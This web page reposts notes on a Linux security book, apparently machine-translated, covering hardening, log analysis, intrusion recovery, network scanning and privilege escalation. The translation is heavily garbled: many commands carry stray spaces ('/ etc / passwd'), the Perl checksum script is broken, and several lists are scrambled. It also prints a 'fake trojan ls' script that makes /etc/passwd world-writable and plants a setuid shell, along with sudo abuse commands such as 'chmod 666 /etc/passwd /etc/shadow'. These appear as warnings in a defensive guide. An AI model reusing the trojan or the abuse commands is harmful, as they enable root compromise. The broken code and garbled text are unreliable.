Home PC Games Linux Windows Database Network Programming Server Mobile  
  Home \ Linux \ Linux system security knowledge     - CentOS7 installed VMware 10 (Linux)

- Android will save the picture to see the album and timely (Programming)

- MacBook Air install Ubuntu dual system (Linux)

- Comparison of sorting algorithms (Programming)

- mysqldump issue a note (Database)

- C ++ constant definition (Programming)

- GitLab remote backup of Linux Shell Scripting (Linux)

- Linux kernel likely and unlikely to resolve macro definitions (Linux)

- grep command Series: grep command to search for multiple words (Linux)

- Swift rewrite initialize method of navigation controller class (Programming)

- Linux non-root user uses less than 1024 ports (Linux)

- CentOS yum install LAMP (Server)

- MySQL5.6 based GTID master-slave replication (Database)

- Android shutdown (reboot) process (Programming)

- CentOS x86 64bit upgrade to 2.7 Python2.6 (Linux)

- Installation of Ubuntu Make under Ubuntu 15.10 (Linux)

- Disable unnecessary services under Linux (Linux)

- Use OpenSSL to generate a certificate detailed process (Linux)

- MySQL 5.5 on master-slave copy filter (Database)

- Java Network Programming Internet address lookup (Programming)

  Linux system security knowledge
  Add Date : 2018-11-21      
  My comment:
This book tells the linux security aspects, and with a question and answer way to introduce clear ideas. This paper provides a very
More helpful safety tips, is an essential reference book Linux system maintenance personnel. Through this book, you can learn linux security
The overall concept of the whole, from system security to application security, network security from a single security. But security is a constantly changing
Of continuously updated process rather than a solution, the book just mentioned security problems have been found at the time of the referral
Shao, emerging security issues can be updated with reference to security warnings and online book sites.
The first chapter outlines linux security
Sticky bit (Sticky bit)
If the user has write access to the directory, you can delete the files and subdirectories that even if the user is not these files
Owner, but does not read or write permission. Sticky bit position appears on the execution permission, denoted by t, the bit is set,
Other users do not belong to him not to remove files and directories. But under that directory does not inherit the permissions set again
Before use.
# Chmod 1770 xxx
File Properties
chattr command to change
lsattr command lists the file attributes
Attribute definition file
A Do not update atime file when limiting disk I / 0 traffic on a laptop or NFS, the useful, in addition to 2.0
Series, this property is not supported by other cores.
a file can only be opened in append mode, only root can set this property.
C When the file is saved to disk, the kernel will automatically compress the file.
d file mark, it can not be dumped.
i file can not be modified, deleted or renamed, you can not create any link to it, and can not write any data.
S When deleting a file, the corresponding disk storage block is cleared.
When S modify a file, it writes synchronization.
When u delete a file, save its contents.
Ulimit command
Setting limits can be added to profile the command file can also be defined in /etc/security/limits.conf file
Command Parameters
-a show all restrictions
-c Core file size limit
Limit -d process data segment size
-f Shell can limit the size of the file created
-m resident memory size limit
Limit the size of the stack -s
CPU Time Limit -t occupied per second
-p pipe size
-n limit the number of files open
-u Limit the number of processes
-v Virtual memory limit
In addition to the available Ulimit command set, you can also define limits /etc/security/limits.conf file.
domino type item value
domino @ symbol is the beginning of a user or group name, * means all users, type set as hard or soft. item refers to
Given resource constraints want. Such as cpu, core nproc or maxlogins
. value is the corresponding limit values.
# Kill -TERM XXXX termination signal
# Kill -HUP HTTPD reread configuration signal
Privileged ports
root users can bind ports less than 1024 unique users. You can trust from a remote machine connected to a port less than 1024
Chapter II Preventive measures to recover from the invasion
system security
Simple FIND command
# Find / \ (- perm -02000 -o -perm -4000 \) -ls system can identify all setuserid and setgroupid
Under the most stringent conditions, it can be removed in addition to / bin / su outside all setXid bit installation.
System security scanning tools cops tiger Nabou
Scanning detector
The first thing done from the network scanning system, scan detector timely informed before hacking the system, is a good
Good intrusion detection system (IDS)
Klaxon Courtney Scanlogd PortSentry
Reinforcement System
Bastille project to create a set of modules to reinforce the newly released RedHat. After installing the system can run the patch,
Can be run at any time, would not necessarily have just installed the system.
Reinforcing methods are: 1, download the source code to the / root directory and unpack. As root, fixed line InteractiveBastille.pl foot
this. In answering questions, the program will make the appropriate changes. After configuration, the tool to keep them in BackEnd.pl
If desired reinforcement similarly configured servers, copy it to the new server and run AutomatedBastille.pl can.
Openwall Linux Patch
It is a kernel patch. To these patches work, the user must recompile and install a new patched kernel. in
In some cases, these patches and the standard linux kernel is not fully compatible, so before you decide to use must be sure to understand it contains
It includes the port scanning kernel-level testing procedures and security warning program. It is a kernel patch (now applicable to 2.2.X and 2.4.X,
But in the future will no longer support 2.2) and system management tools. Features include:
1, advanced file protection, even root can not be found and the disposal of documents protected by LIDS.
2, process protection, the kernel refused to send a signal (such as SIGKILL) to protected processes, the process can also be completely hidden
Hide not exist any trace at / proc.
3, better access control, a more efficient use of the privileges associated with power, including the prohibition root change these capabilities.
4, built-in port scan detection, built-in kernel scanner can detect Nmap, SATAN tools such vast
Partial scan.
To install the LIDS, you must download the latest official version of linux kernel source code and LIDS. Use LIDS patch to the kernel,
Then recompile the kernel.
Log file analysis
syslogd cancellation letter can be marked for specific functions and levels in the /etc/syslog.conf file can be set up according to these two options
Consumers set whereabouts of the letter.
syslogd Functional Description
auth Security / verification message (negative)
authpriv security / validation message
cron cron and at
daemon Other system daemons (sshd, xinetd, pppd, etc.)
kern kernel messages
lpr line printing system
mail Messaging Subsystem (sendmail, postfix, qmail, etc.)
news Usenet news messages
syslog syslog messages inside
user general user-level messages
uucp UUCP subsystem
Level local0-local7 custom
Log Level Description
emerg system has been unavailable
alert action must be taken immediately
crit critical
err error
warning Warning
notice ordinary but important case
info notification message
debug debug messages
syslog.conf configuration format of each line
facility.loglevel logtarget, all fields are separated by tab
daemon.notice /var/log/daemon.log the program sends over the function daemon, priority notice
Or higher levels of all log messages to /var/log/daemon.log file, you can use all the functions of an asterisk indicates a match
Or you can log level.
Target description
/ Path / to / filename to append messages to the designated end of the file, which is the most common scenario.
@loghost writes syslog server loghost machine. The log can be easily sent on multiple machines,
| / Path / to / named_pipe written to the specified named pipe (easy to filter messages using an external application).
user1, user2 written to the user list.
* Writes all logged-on user.
/ Dev / console writes the named terminal.
Log file permissions
Logs should be set only by root and write, and log can be set (or your desired group) to read, and other users
No access. A user to enter a user name password used where, at the time of login fails, the user name (in
In this case the password, because the user mistakes) recorded in the log. Then create a log belonging to the group of fictitious user, and let
All log checkers run as that user instead of root. Log inspection procedures should not be run as root user.
You can start monitoring logs through log analysis software, such as logcheck, swatch and logsurfer. But the best tool or administrator to write their own script.

File system integrity checking
Modify the file system after hackers break into systems often do one thing, here are some frequently modified text
Type Example
Server configuration file /etc/inetd.conf,/etc/ftpaccess
Network profile /etc/host.conf,/etc/sysconfig/network
System configuration files /etc/ld.so.conf,/etc/nsswitch.conf
crontab /etc/cron.daily/*,/var/spool/cron/root
setuserid program / bin / su, / bin / ping, usr / bin / chfn, / sbin / dump
setgroupid program / sbin / netreport, / usr / bin / lpr, / usr / bin / write, / usr / bin / man
If you know when the machine has been compromised, you can determine when to modify, and find out what things are modified, for example, want to know all the files in the incursions of September 17 have been modified, you can execute the following command:
# Touch 09170000 / tmp / comparison
# Find / \ (-newer / tmp / comparison -o -cnewer / tmp / comparison \) -ls
But remember, time to check the file statistics given are unreliable, touch command to change any file modification time (mtime) and access time (atime).
Checksum checksum is a mathematical algorithm to generate the strings can be used to determine whether two files are identical, even if only in a file changes a bit, and their check will be different. Usually md5sum command.
# Md5sum xxx
File Permissions
By examining the file permissions, the user can know the modification occurred at a time and determine their behavior is legal, accidental or malicious, and determine their impact on the system.
Checksum generation and Licensing database generation and verification, the following is a quick perl script files before hacking systems, enabling users to generate their own file permissions and checksums database (text).
#! / Usr / bin / perl
use MD5;
require 'find.pl';
$ Md5 = new MD5;
@dirs = @ARGV;
for $ dir (@dirs) {find ($ dir);}
sub wanted {push @ files, $ name;}
for $ name (sort @files) {
($ Uid, $ gid) = (stat $ name) [4,5];
$ Stat = sprintf "% 0o", (stat _) [2];
unless (-f $ name) {
printf "$ stat \ t $ uid $ gid \ t \ t \ t \ t \ t \ t $ name \ n";
$ Md5-> reset ();
open FILE, $ name or print (STDERR "Can not open file $ name \ n"), next;
$ Md5-> addfile (FILE);
close FILE;
$ Checksum = $ md5-> hexdigest ();
printf "$ stat \ t $ uid $ gid $ checksum \ t $ name \ n";
Try not to generate a database on the machine, or other machines to be placed on a write once read many (CDR) of the machine.
Existing file integrity tools Tripwire AIDE Nabou
How do you know when the system was hacked
Discovery of system intrusion methods:
1, Home change
2, the sharp reduction in disk space view disk usage with df tool
3, frequent use of the network using netstat -na or lsof output, check what connection exists
4, contact from other administrator when your machines are used to attack other machines
5, promiscuous mode network interface if hackers want to sniff network services available in the system, will set up a network interface
Promiscuous mode (capture all packets). Please check the ifconfig -a output promisc to determine access
Port mode.
6, erase / truncated log file check syslog
7, corrupted utmp / wtmp
8, new users are typically present in the system hacker using the name with the existing username to reduce similar found
Opportunity, for example lpr or lp approximate uucp1 like. or
Hackers dialect names such as t00r and own3d.
9, running a strange program
10, can not explain the usage of CPU
11, the local user account is compromised remote
12, "looks weird" things
Measures to be taken after the invasion
Curb damage
1. Close all network interfaces, the system allows hackers to lose the ability to interact with the behavior, but that process is still running http://www.linuxidc.com/
2, will continue to run.
3, the system switches to single-user mode, turn off all official root process and all user processes, and any remaining process
4, it may be from the hacker.
3, using the undamaged linux boot disk to reboot the system. Read-only mode loading system, check the system to see hackers
Moved by the hands and feet.
4, control serious damage.
Damage estimate
Read-only mode hang all partitions and record anything found.
1, to find suspicious files and directories password files, hacking tools and you do not have any place in the system directory. This
These directory before you reboot may not be visible.
2, position the new program setuserid any new setXid procedures (particularly those belonging to the root) are very suspicious.
3, check the time stamp check changed after hacking files.
4, read the log file to check all the log files.
5, verify the checksum database validation and comparison of before and after hacking.
6, verify package installed confirm the correct version, hackers can downgrade the software to allow the system to use the uneasy
The full version.
7, manual verification profile quick to identify changes, such as web run as root, or
Additional servers /etc/inetd.conf appeared.
8, the backup file
9, a special tool has many tools to help check the system, is the latest component is coroners toolkit.
10, notify authorities.
Online restore determined after hacking, there are two options, 1, and plug the loopholes in the system has been tampered with part-enabled backup; 2, reinstall the system. The safest method is to completely reinstall your system.
Just plug the loophole and found generally continue to run much faster, but you may not identify all the things done by hackers in the system. Hackers can leave in a few months after the onset of Time Bomb, also possible to modify the system binaries, making it unstable. Therefore, the best way to remove from the system the hacker out of our recommendations are as follows:
1, back up important files.
2, all fully formatted drive (this is also the best time for any system changes, such as adding or changing the hard disk
Partition size to take full advantage of the favorable conditions downtime)
3, re-install the linux version, and contains only the essential things that.
4, installed packages will be completely upgraded.
5, checksum generation and save it in a safe place.
6, the configuration files necessary to manually modify. Do not just copy the files from the backup, they may have been changed
7, copy the necessary files from the backup.
8, re-check the installation from backup files, make sure it has not been damaged tracks like.
9, computing and file system check using another method.
10, for the first time enabled network.
Actual or perceived attacks commonly used strategy is the ability to cancel the attack machine to communicate with this machine. Specifically
There are several:
1, using tcp wrappers, reject connections from the hacker's ip.
2, the use of iptables rules to return / reject packets from that ip address.
3. Create a refusal routing table so that this unit can not communicate and the corresponding ip address, this time, you can still receive from the source address
Package, but we can not respond, thereby destroying the communication between each other.
4, create a similar denial on the firewall access list.

The third chapter of the machines and networks Capitol
Newsgroup / mailing list search
There are many on the internet newsgroup / mailing lists or forums, it is a good place to knowledgeable people to ask questions, but may
Completely unconscious under the information disclosure system. For example, the company's network topology, security configuration, phone number, tube
Administrator name, and other personal information.
For the posting child to repeatedly re-reading, deleting any information could be exploited by hackers. Or use the system not related to accounts issued
Send e-mail, such as free e-mail application.
whois database
ping scanning
ping ping scanning means all designated network ip, if the machine is listening ip address, it will respond to ping. thereby
We know it is active. Hackers list all machines running this way, then decided to attack the target.
There are two different methods of ping hosts: ICMP ping and echo ping. You can use some tools to accelerate ping. Two of
Most meaningful: Fping and Nmap
ICMP ping method: the source machine send icmp echo request to the destination machine if the target machine is running, it will ring.
Should icmp echo reply.
# Ping -c 3 target
echo ping Methods: udp or tcp packets to connect to the target machine's echo port (port 7), if the machine is in the operating state,
The port was sent directly back over the information.
# Telnet target.example.com echo
Fping ping tool is a straightforward, you can list the machines need to ping at the command line, you can also use file party
# Fping -a / dev / null
Nmap is a versatile scanning tool built ping scan function.
# Nmap -sP
ping fire Countermeasures
By configuring the machine (iptables, etc.) to reject the incoming and outgoing echo request packets echo reply packet. Thereby avoiding
In response to icmp echo request. Turn off the machine echo service. Comment out the following two lines in /etc/inetd.conf
echo stream tcp nowait root internal
echo dgram udp wait root internal
Restart inetd.
dns problem
On linux, the best dns server is bind, it has several versions, if you are the avant-garde, bind9.x is the best choice,
Is the most stable version 4.x, 8.x is a good filter, most of these sites are using this version. Please keep in bind
The latest version is, most of its many security holes, and once discovered vulnerabilities, it will be exploited.
Try not contain hinfo and txt information in the configuration file.
Zone transfer
Under normal circumstances, in order to ensure dns always, each domain has a primary dns machine, while others are secondary dns,
Whenever dns area changes, the secondary dns machine will copy the entire contents from the host device. System becomes secondary dns square
Method is to add the following in named.conf:
zone "expample.com" {
type slave;
file "slave / expample.com";
masters {xxx.xxx.xxx.xxx};
But hackers can also grab the zone file (if no measures are taken), the following example is given using the host command to list the entire domain
All NS, A and PTR records.
# Host -t ns example.com
# Host -l example.com
When configuring the primary name server to not allow zone transfers in addition to the secondary server machine. Provided global default options
as follows:
option {
allow-transfer {xxx.xxx.xxx.xxx};
Warning: You must ensure that the master and slave servers are prohibited zone transfer, because the server can accept zone transfer requests.
Any unauthorized zone transfers will be recorded syslog.
Anti-analytic process refers to the domain name from ip. You can use the host command. If you use a large number of real host name, will
Hackers know the functions of the machine. It is best to use the general anti-analytic name as PTR records:
Port Scan
Hackers can run one or more port scanning tool to understand the service provided by the target system. Tools are
netcat, strobe, nmap (best). Fun nmap can learn a lot. Including their own systems, including networks.
Web Vulnerability Scanner
iss, satan, Nessus
Encrypting File System
CFS, TCFS, BestCrypt, PPDD, Encrypted
Chapter IV social engineering, Trojan horses and other hacker tricks
Chapter V physical attacks
Physical attacks Summary
1, do not remember the password or ID to access others can see it.
2, do not put the phone book, organizational charts, memos, internal manuals, meeting arrangements or internal security policy forgotten in capacity
To be read or stolen place.
3, when discarded print documents, electronic media or customer data must be careful to sensitive material marked as "sensitive", in
Pretreatment crushed sensitive documents and manuals. Erase data of the electronic media, and all the trash is placed in the illumination shape
Condition good protection area.
4, when the network infrastructure must be carefully labeled. This information is recorded in a clear network diagram, and locked up.
5. Use a good screen saver with a password to ensure, and to hide the screen content at runtime. Set the delay
6, to a reasonable value --- to run it in a reasonable time after.
6, must leave the system, lock the screen.
7, when using a portable machine, it must as far as possible will be close at hand at all times. Of thieves who take it from you body too
8, opening trick vigilant. Entering the workplace every laptop label, when removed from its security checks.
8, avoid the use of dual boot system, linux security depends on the security of the machines installed in the worst system.
9, set up password protection at boot loader to prevent possible to obtain root privileges to restart illegal manner.
10, set the BIOS password to prevent it from being modified.
11, all the sensitive system in a locked room, to prevent damage.
12, use a good file encryption system can prevent those who obtain system privileges to see confidential data. This should serve as a baseline of security and defense.
Chapter VI cyber attacks
Legal tcp flag combinations
Flag combination Meaning
This is the first SYN packet tcp connection, and expressed the wish to establish a connection with the target system.
SYN | ACK target system by identifying the original message and sends a SYN message in response to SYN packets.
Each packet ACK to establish the connection to be set up during its ACK bit to confirm receipt of the data front
FIN When ready to close the connection, sends FIN to each other.
FIN | ACK This combination is used to confirm the first FIN packet, and complete the shutdown procedure.
RST When the system receives unwanted packets, sent RST packet to reset the connection --- for example, the system does not issue a SYN
The case received SYN | ACK.
ICMP Type Code
ICMP message type code
0 echo response (response PING)
3 destination address unreachable
4 Source End
5 Redirection
8 echo (PING request)
11 TTL timeout
12 Parameter Problem
13 request timestamp
14 Response time stamp
17 address mask request
18 address mask response
Exporting Attack misconfigured NFS
To protect against unauthorized access to the file system, so that the firewall should be blocking NFS, by preventing NFS (2049 port)
Incoming connections can do it. If the internal do need to ensure that it is only necessary to export the file system. For example, in
Allows remote loading user's home directory, use the / home replacement /. To verify the correct configuration of NFS, check
/ Etc / exports and / etc / dfs / dfstab to make sure that does not export anything outwardly to read and write permissions.
Attack Nestscape default configuration
SuiteSpot is a tool for managing the web server, which contains the implementation of this function java and javascript code.
User name and password will Nestscape server configuration is saved in the root directory of the file service, the default can be used by anyone
Read. Located / web_server root / admin-serv / config / admpw. Using a web browser on the network and refers url
To this document can be obtained. File format is user: password. Although this file is encrypted, but the password can enter
Line brute force attack. It should be protected admpw file,
Attack of the Squid server configuration error
Squid can be incorrectly configured to allow external access to internal system address as the proxy. This allows the attacker to be able to serve
As a proxy server to view or access the internal network, even if the address can not be routed. An error with squid.conf file
Set as follows:
First, set the correct address external firewall rules to block port 3128 (proxy port) connection. Then edit the feature
Configuration file, make sure the correctness of the following content.
x windows system
It uses port 6000 --- 6063
Attack X configuration error. xhost tool for the protection of the basic security X, users can use this procedure to specify allowed
Xu connection system local X server. If executed with no parameters, lists all of the system allows the connection, you can
And the following command to add a new system.
# Xhost +
If you omit the system and name, then any system can establish a connection. So the intruder can record a program by xkey
Users record all keystrokes sequence on the X Window interface. Another similar program is xscan, you can scan the network for X
The vulnerability of the system.
The main port is blocked on the firewall 6000--6063.
# Ipchains -A input -p tcp -j DENY -s -d 6000: -6063
If not blocked, the parameters can -auth start xinit program. The system uses the "magic cookies" at the time of certification.
Or to transfer X ssh session. When using the X11 ssh, remote root user to the local X server with full privileges.
Use X11 ssh when both sides trust.
The default password
Red Hat provides for linux server Prianha virtual server and balanced package. In Prianha-gui program
There is an account named prianha version 0.4.12, the default password is q.
Countermeasure is to modify all system and network device's default password.
Sniffer Network Information
When sniffer work, the so-called card set to promiscuous mode, in this mode, the card will transmit data of each frame are
To the protocol without checking its MAC address. Thus, the system sniffer can check the data frame, and the removal of invigoration
Interesting information. Including header information or other information, such as passwords and user names. Many protocols send unencrypted Min
A sense of information, so a hacker can use a sniffer is eligible for access to the system. Such as telnet, ftp, http the password and user
Names are spread directly on the network, in addition, some of the web-based management tools in a general http protocol for transmitting user
Name and password, such as webmin is the case. The best way to avoid harm by the sniffer is not on the network in order to not
Transfer user names and passwords encrypted manner, through the use of ssh instead of telnet, transferring sensitive information by substituting http https
Can greatly enhance the security.

Common sniffer
tcpdump, hunt, linux-sniff, snort
Password guessing
In most linux, the password length is limited to eight characters. If you only use lowercase letters, the total fear 26 8
Th power (about 209 billion) combinations, if you allow the use of capital letters and figures, there are 62 to the 8th power (approximately 218
Trillion) combinations.
Protection system account, closed finger and rwho service. Restrict root login only from the console. You can modify
/ Etc / securetty file to do this. This document lists the tty (terminal) root can log in this file only
Including tty1 - tty6, you can only restrict root login from the console. If you delete all the rows from the file. Any person
Before obtaining root privileges to other users must first log in, and then use su. Modify /etc/login.def minimum password
Buffer Overflow Vulnerability
When a developer uses the wrong way to write in the program operation code, it may cause a buffer overflow. Most culprit
It is a standard C language string functions. For example strcat (), strcpy (), sprintf (), vsprintf (), scanf () and gets (). This
These functions do not check the size of the parameter before executing it. The attack against procedures
rpc.mountd (nfs), rpc.statd (nsf), imapd / popd, wu-ftp. Once the system tries to buffer overflow attacks, usually
See such behavior from the log message.
For frills, close them, or a firewall blocking its access. If service is required, only a
Measures is to make the system apply the latest patches.
netstat, lsof tool recognition system can run into the program, open ports and other information. But these programs are not reliable,
It can be replaced by a hacker. You can use nmap from an external scan system to other training services, because from the outside scan, it will not be
Hands hacker in the system made the deception.
# Nmap -sT -O xxxx tcp scan of the system.
# Nmap -sU -O xxxx udp scan of the system.
Chapter VII of the malicious use of network
DNS attacks
bind buffer Fraud
dns is a distributed system that uses caching to reduce network load, there is a version 4.9.6 and asked BIND8.1.1 in
Problem that they did not verify the legitimacy of the information received from other name servers. Hackers can exploit this vulnerability in the head village
Server inserted falsification of records, and guide customers to the hacker's machine up. Thereby capture passwords and sensitive information.
Source routing allows the sender to specify the data packets arrive at the destination on the front path via the internet. This feature for network
Exploration useful, but can also be used to bypass security gateways and address translation.
# Cat / proc / sys / net / ipv4 / conf / eth0 / accept_source_route 0 if not allowed 1 Permits
Incorrect ip forwarding
/ Proc / sys / net / ipv4 / ip_forward ip forwarding configuration file. 0 disables 1 if allowed. This function is for prevention
Firewalls and ip masquerading gateway is necessary, but for the name server, mail server or bastion host is unnecessary. Might as
Under prohibition:
# Echo 0> / proc / sys / net / ipv4 / ip_forward /etc/sysctl.conf of net.ipv4.ip_forward = 0 control systems
Whether to allow startup.
Both packet sniffing and session hijacking function.
Use openssh.
It is a group of excellent network auditing, testing and sniffer tools.
Disguised as ssh client server, and the server disguised as ssh client, by default, it will record all user names
And password.
sshmitm dependent on the user from checking the ssh host key, when the first connection to the server, will be
$ Home / .ssh / known_hosts add the host key. The key should compare with the actual server key (usually in the text
Member /etc/ssh/ssh_host_key.pub /etc/ssh_host_key/.pub in) or consistency. If they do not match, then said
Ming hackers have been involved in earlier sessions. And access to the password, it should immediately disconnect, and notifies the system administrator reset
Set a password to prevent account abuse by hackers. In order to prevent the use of potentially unsafe connection unintentionally, should be configured ssh
Mandatory host key checking. About to write the following lines to the $ home / .ssh / config at the beginning of.
Host *
StrictHostKeyChecking yes
You can also configure the global ssh_config file system into StrictHostKeyChecking.
Currently, Sshmitm only supports ssh version 1, but does not guarantee support ssh version 2 software is not development.
It works very similar and sshmitm, it listens on port 80 (http), and 443 (https). Relay For practical clothes
The web server requests. And the results returned to the client. Because webmitm no real ssl server certificate and key,
It must be a fake. Therefore, when the first run webmitm, it will generate a related ssl openssl
Keys and certificates. When a user connects https site, their browser will attempt to verify the ssl certificate obtained, but webmitm
Certificate Server created without the browser data stored in a trusted official signature of the issuing agency. So the browser will pop up
A series of dialog boxes to confirm whether the user wants to connect to possible fraud sites. If the user clicks and ignore all warnings,
Like everything is normal as it is possible to visit the web site. However, the session is actually flowing through webmitm program, which can use
Access to all data.
And sshmitm as more important than the technical problem is user training. When the browser is given numerous Are you sure? This has
When the question of value, not simply click Yes.
SYN flood attack
Under the tcp / ip protocols, upon receipt of the initial SYN packet, the server TCP protocol stack corresponding coupling halves
Record is added to the queue. Wait a moment, and then to receive the remaining handshake packets. If successful, delete the record from the queue
record. Because the queue to accommodate a limited number of semi-connected record, so if many initiates connection ultimately unsuccessful handshake.
It will be a problem, once the queue is full, the server will no longer be accepting new connections. When the attacker is able to be fast enough
Sends a SYN packet to the target server to fill up the queue, it is possible to block any tcp services. This is the SYN flood
attack. If the web server does not accept the request, or even the local connection too slow, you should use netstat -nat to
Check in connection SYN_RECV semi-connected state. Once the system is subject to SYN attacks. You can use the following shell
Script tracks the number of half-connections:
#! / Bin / sh
while [1]; do
echo -n "half-open connectons:"
netstat -nat | grep SYN_RECV | wc -l
sleep 1
If zero, indicating that attackers abandoned. If the number reaches a maximum and becomes more balanced, it is unfortunate, queues
Can is full.
Upgrade to 2.0.29 or later, increasing the capacity of the queue in these versions. And shorten the time-out value, and thus more difficult to fill
full. In addition, a few modifications in / proc to shorten the wait for SYN | ACK timeout period and increase the number of SYN queue
The maximum number of data packets.
/ Proc / sys / net / ipv4 / vs / timeout_synack
/ Proc / sys / net / ipv4 / vs / timeout_synrecv
/ Proc / sys / net / ipv4 / tcp_max_syn_backlog
In the attack, it can increase the value tcp_max_syn_backlog reduce timeout_ * values. Changing these values can lead to
Lost legitimate connection, but if we do not take measures to SYN attack, the system will lose all connections.
Implement egress filtering
Many attacks are dependent on ip address spoofing to mask the source or the attack response traffic to the actual and not sent
The host requests and export filter (egress filtering) is the most important way to prevent spoofing. Connected to a different network
Router should check all outgoing traffic only when the packet has a corresponding local network to allow it to pass legal address
Too. It seems a matter of course, but there are indeed many network allows any source address of the packet through.

Chapter VIII elevated user rights
setuserid program to the owner rather than the user id id privileges.
setgroupid procedures to set permissions instead of caller id id privileges.
Include in the path. "" Bad habits
Include in the path. "" You can reduce the user's keystrokes to substitute sh foo foo or ./foo. These practices have a great
Danger. For example, create the following ls file in / tmp.
! # / Bin / sh -
#fake trojan ls
if chmod 666 / etc / passwd> / dev / null 2> & 1; then
cp / bin / sh /tmp/.sh
chmod 4755 tmp / .sh
exec ls "$ @"
#end of script
If you set the environment variable in the ".", And its location in the system where the first ls directory, when the user performs in / tmp
When the ls command line, execute the script given above, rather than the actual ls command. Because eventually executed ls,
So users will not see any exception. If the command is executed is root, it will set the password file writable, and
Copy the shell to / tmp saved as .sh, and set its setuserid bit. All of this happened very quietly. in
You can modify the path in multiple places when you log on, such as / etc / profile or /etc/profile.d the script. Manually modify the more hemp
Tired, and prone to error. Recommended bashrc or .profile files are not added at the end the following line:
PATH = `echo $ PATH | sed -e 's / :: /: / g; s /:.:/:/ g; s /:.$//; s / ^: //'` to delete the path All ".", including the other shape
Plaintext password
Remove the user's password file, as fechmail the control file. If you must do that, make sure that files can only be
Read owner, group members, or which can not be accessed by others.
Password is stored in the file system
Some systems may require passwords stored in the file system, for example, within a smbprint samba package
Tool that allows the printer to use linux and windows connected. usually
For dial-up users, user name and password required link is usually stored in a file, in general ppp
In / etc / check ppp / chap-secrets file password, and then look in the /etc/wvdial.conf Wvdial in. Use chmod 600
to limit the file filename. Can only be read using root.
User name and password to control the access to the printer. To save smbprint password protection must be ensured and
Not all users can read each config file / var / spool / lp down and look at all the / var / spool / lp directory
.config File, execute chmod o -rw for each file.
Reversible password
pop3 usually transmitted over the Internet in plain text user name and password authentication information. This is not a good thing, a person alternatives
Formula is to use the name Popauth authentication method. Popauth after all the password to some reversible encryption process stored in
Database. If an attacker can access the database, the system for all users and passwords will be threatened. if possible,
Do not use popauth, many pop3 client support ssl encryption, try to use ssl encryption for user recognition
Card protection, if you must use popauth, make sure that / etc / popauth can only be read by root.
Command line password
Some utilities, such as patients with smbmount and smbclient, allows the command line or environment variables to pass a password. This
Like the password can be obtained by using the ps command or directly read the file / proc under. All input commands are saved in
shell history file .bash_history. Anyway to avoid the command line, enter a password. And periodically to remove calendar
History file to avoid long-term accumulation of command and safety information. If you do not want to record some commands to be run, can be inverted
Hisfile environment variable to turn off the history function, and then open a new shell.
Group write permission
A member of the main group of the invasion, the group will increase the security threats to other members. Each user should have their own unique primary group,
And the group he is the only user, then all users when files are created using only the main group, unless modified
Group ownership to solve the problem of shared file access via a secondary group. Users umask setting should be set to strict
Safety value to avoid the file is created, it can be set by default to read and write, set umask to 066 files can be guaranteed
After you create Only the owner has read and write permissions. The group members, and other people can not read or write the file. In extreme cases,
You can use the 077 umask. The default umask so that files can only be root user privileges or root access.
Special purpose groups and device access
Attackers typically locate the license improperly set the device in / dev, they can take advantage of these conditions to access memory, or disk
Serial co-ordination. And on this basis, further intrusion systems and sensitive documents. For example, through the / dev / kmem can access within
Nuclear storage area, the attacker has read access to the file on any data from which the system currently in use to read. If the disk
Partition (such as / dev / hda1) readable, the attacker can read the original disk data. She can use the / sbin / dump straight
Then get a copy of all the files in this partition. Such variations can bypass all file permissions. And all documents, including
/ Etc / shadow and other documents can be read without requiring root privileges. If users need to access only root has access
When asked special device files, you should consider using Sudo.
wheel group
It is a special group on the system, the system enabled wheel group, only members of that group can su to root, that is,
So that the root password is compromised, if the user is not a member of the wheel group, you can not run su and enter root. For remote root
Login, this will restrict the means and / etc / securetty file combination can enhance system security and protect the most important root account. The disadvantage of using it is that it accounts for the attacker to determine that this is more valuable and permissions provide clues. Even predefined wheel group, most linux system does not automatically enable access control wheel group. Support systems for pam, pam control as long as the appropriate file (/etc/pam.d/su) add pam_wheel line can support wheel group.
sudo is a common tool for administrators to share some of this authority. Use sudo, you can allow certain users to perform specific administrative tasks typically must be the root user can run. For example, you can authorize a user to add, delete or modify a user or their own passwords.
sudo password change generally, according to the system administrator authorization, ordinary users can run the passwd command, when you run this command, the user can change any password, including the root, which is obviously a problem, we should create a script to check with the front end opposite password username to confirm the legitimacy of its modification. In general, the system user id number is less than a preset value (usually 200 or 500). If you try to modify the id number is less than the minimum, the script should generate an error. The system according to the policy, the script should also check and ensure that users are not locked and changed owns legal shell.
sudo editor operation
Typically, a user with the right to gain access to the configuration program may run the editor, for example crontab -e -u user. Most of these programs because I was allowed to pass through the environment variable VISUAL OR EDITOR set the default editor. So you can run virtually all programs. The editor should be limited within the range of well-known, such as vi, ed or emacs. But the editor can also execute shell or external command. Because the editor run as root, so long as any program run by the editor to get the shell
, And will be owned by root privileges. The best solution to this problem is that when editing the file, it should lock the file and copy it to a safe location ordinary users with minimal permissions to edit. The user then re-edit the temporary file, and will not compromise your system protected files. After editing is completed, ensure that no changes to the restricted area, and the changes made and consistent file structure and system requirements, and then modify the file and then copy the file to the original and unlocked.
Other programs bring sudo Vulnerability
chmod, allows developers to set the directory to be written to complete the work. An attacker can run chmod 666
/ Etc / passwd / etc / shadow, and freedom to create or modify accounts.
chown, allow a public area (such as a web document tree) of the developer to gain control of other developers file.
Attack effect with chmod.
tar / cpio, allows users to create documents and backup. An attacker can be used to extract files to replace the execution file system or configuration files.
mount, allows the user to mount a remote file system. An attacker can be used to load the file system contains setuserid programs in order to use an attacker to gain system privileges.
useradd, to allow trusted users to create a new account. An attacker can use to create a new root-level account.
rpm, install rpm packages. Software used by attackers to downgrade the system so that it can contain exploitable vulnerabilities, or to install and use an attacker to gain root privileges rpm packages.
When you create a sudoers file should be allowed to run the program and set the parameters in detail. The following example configure two groups,
You can only specify start and stop options httpd_restricted users in the group run apachectl program. The httpd_full group members can run all options are supported.
User_Alias httpd_full = king, ryan, chris
User_Alias httpd_restricted = guest, tax
Cmnd_Alias apachectl = / etc / apachectl *
Cmnd_Alias web_restart = / etc / apachectl start, / etc / apachectl stop
httpd_full ALL = (ALL) apachectl
httpd_restricted ALL = (ALL) web_restart
By explicitly listing the parameters to prevent users of a free program, to avoid the improper use of the situation. Caution should be used front-end script designed to validate the parameters. In the script should inspection path, libpath and editor-sensitive environment variable. We must be given an absolute path to avoid Trojan horse attacks.
Format string attack the problem now programmers like * printf () or syslog () formatted output and other support functions to print a simple string of occasions, the right way should be:
printf ( "% s", str), however, in order to save time and less to play six characters. Many programmers omit the first turn and enter the following
Command parameters: printf (str).
General prevention of setuserid
